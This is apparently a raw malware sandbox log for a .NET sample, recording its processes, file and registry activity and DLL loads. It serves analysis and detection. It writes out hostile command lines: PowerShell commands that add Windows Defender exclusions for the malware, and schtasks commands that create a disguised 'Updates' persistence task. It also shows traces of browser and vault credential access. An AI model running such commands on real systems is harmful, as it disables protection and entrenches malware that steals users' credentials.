                Source: C:\Users\user\AppData\Roaming\rlJvZXSinaRi.exeMutant created: \Sessions\1\BaseNamedObjects\FfcRgKWzEumrezRaCzBFEJJyTyT
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6092:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6924:120:WilError_03
                Source: C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exeFile created: C:\Users\user\AppData\Local\Temp\tmp1B5C.tmpJump to behavior
                Source: MN1qo2qaJmEvXDP.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: MN1qo2qaJmEvXDP.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.98%
                Source: C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                Source: C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: systray.exe, 00000013.00000003.2803665945.0000000002FA0000.00000004.00000020.00020000.00000000.sdmp, systray.exe, 00000013.00000002.4778260554.0000000002FC1000.00000004.00000020.00020000.00000000.sdmp, systray.exe, 00000013.00000003.2803784366.0000000002FC1000.00000004.00000020.00020000.00000000.sdmp, systray.exe, 00000013.00000002.4778260554.0000000002FCD000.00000004.00000020.00020000.00000000.sdmp, systray.exe, 00000013.00000002.4778260554.0000000002FF0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: MN1qo2qaJmEvXDP.exeReversingLabs: Detection: 63%
                Source: MN1qo2qaJmEvXDP.exeVirustotal: Detection: 47%
                Source: C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exeFile read: C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exeJump to behavior
                Source: unknownProcess created: C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exe "C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exe"
                Source: C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exe"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\rlJvZXSinaRi.exe"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\rlJvZXSinaRi" /XML "C:\Users\user\AppData\Local\Temp\tmp1B5C.tmp"
                Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                Source: C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                Source: unknownProcess created: C:\Users\user\AppData\Roaming\rlJvZXSinaRi.exe C:\Users\user\AppData\Roaming\rlJvZXSinaRi.exe
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                Source: C:\Users\user\AppData\Roaming\rlJvZXSinaRi.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\rlJvZXSinaRi" /XML "C:\Users\user\AppData\Local\Temp\tmp4FBA.tmp"
                Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\AppData\Roaming\rlJvZXSinaRi.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                Source: C:\Program Files (x86)\JycEzTeMQKrLvqFdrvzCnnBkVuTlFGdDUiXjvDhFdgdDsdwSNLmkiipnYhjsmfsEUTowhpegZNOxJo\aDvThgRLSEMTIq.exeProcess created: C:\Windows\SysWOW64\systray.exe "C:\Windows\SysWOW64\systray.exe"
                Source: C:\Windows\SysWOW64\systray.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exe"Jump to behavior
                Source: C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\rlJvZXSinaRi.exe"Jump to behavior
                Source: C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\rlJvZXSinaRi" /XML "C:\Users\user\AppData\Local\Temp\tmp1B5C.tmp"Jump to behavior
                Source: C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
                Source: C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
                Source: C:\Users\user\AppData\Roaming\rlJvZXSinaRi.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\rlJvZXSinaRi" /XML "C:\Users\user\AppData\Local\Temp\tmp4FBA.tmp"Jump to behavior
                Source: C:\Users\user\AppData\Roaming\rlJvZXSinaRi.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
                Source: C:\Program Files (x86)\JycEzTeMQKrLvqFdrvzCnnBkVuTlFGdDUiXjvDhFdgdDsdwSNLmkiipnYhjsmfsEUTowhpegZNOxJo\aDvThgRLSEMTIq.exeProcess created: C:\Windows\SysWOW64\systray.exe "C:\Windows\SysWOW64\systray.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\systray.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exeSection loaded: windowscodecs.dllJump to behavior
                Source: C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exeSection loaded: dwrite.dllJump to behavior
                Source: C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exeSection loaded: iconcodecservice.dllJump to behavior
                Source: C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exeSection loaded: edputil.dllJump to behavior
                Source: C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                Source: C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exeSection loaded: appresolver.dllJump to behavior
                Source: C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exeSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exeSection loaded: slc.dllJump to behavior
                Source: C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                Source: C:\Users\user\Desktop\MN1qo2qaJmEvXDP.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\rlJvZXSinaRi.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\rlJvZXSinaRi.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\rlJvZXSinaRi.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\rlJvZXSinaRi.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\rlJvZXSinaRi.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\rlJvZXSinaRi.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\rlJvZXSinaRi.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\rlJvZXSinaRi.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\rlJvZXSinaRi.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\rlJvZXSinaRi.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\rlJvZXSinaRi.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\rlJvZXSinaRi.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\rlJvZXSinaRi.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\rlJvZXSinaRi.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\rlJvZXSinaRi.exeSection loaded: windowscodecs.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\rlJvZXSinaRi.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\rlJvZXSinaRi.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\rlJvZXSinaRi.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\rlJvZXSinaRi.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\rlJvZXSinaRi.exeSection loaded: dwrite.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\rlJvZXSinaRi.exeSection loaded: iconcodecservice.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\rlJvZXSinaRi.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\rlJvZXSinaRi.exeSection loaded: edputil.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\rlJvZXSinaRi.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\rlJvZXSinaRi.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\rlJvZXSinaRi.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\rlJvZXSinaRi.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\rlJvZXSinaRi.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\rlJvZXSinaRi.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\rlJvZXSinaRi.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\rlJvZXSinaRi.exeSection loaded: appresolver.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\rlJvZXSinaRi.exeSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\rlJvZXSinaRi.exeSection loaded: slc.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\rlJvZXSinaRi.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\rlJvZXSinaRi.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\rlJvZXSinaRi.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\systray.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\systray.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\systray.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\systray.exeSection loaded: ieframe.dllJump to behavior
                Source: C:\Windows\SysWOW64\systray.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\systray.exeSection loaded: netapi32.dllJump to behavior
                Source: C:\Windows\SysWOW64\systray.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\systray.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\systray.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\SysWOW64\systray.exeSection loaded: wkscli.dllJump to behavior
                Source: C:\Windows\SysWOW64\systray.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\systray.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\systray.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\systray.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\systray.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\systray.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\systray.exeSection loaded: mlang.dllJump to behavior
                Source: C:\Windows\SysWOW64\systray.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\systray.exeSection loaded: winsqlite3.dllJump to behavior
                Source: C:\Windows\SysWOW64\systray.exeSection loaded: vaultcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\systray.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\SysWOW64\systray.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\systray.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Program Files (x86)\JycEzTeMQKrLvqFdrvzCnnBkVuTlFGdDUiXjvDhFdgdDsdwSNLmkiipnYhjsmfsEUTowhpegZNOxJo\aDvThgRLSEMTIq.exeSection loaded: wininet.dll
                Source: C:\Program Files (x86)\JycEzTeMQKrLvqFdrvzCnnBkVuTlFGdDUiXjvDhFdgdDsdwSNLmkiipnYhjsmfsEUTowhpegZNOxJo\aDvThgRLSEMTIq.exeSection loaded: mswsock.dll
                Source: C:\Program Files (x86)\JycEzTeMQKrLvqFdrvzCnnBkVuTlFGdDUiXjvDhFdgdDsdwSNLmkiipnYhjsmfsEUTowhpegZNOxJo\aDvThgRLSEMTIq.exeSection loaded: dnsapi.dll
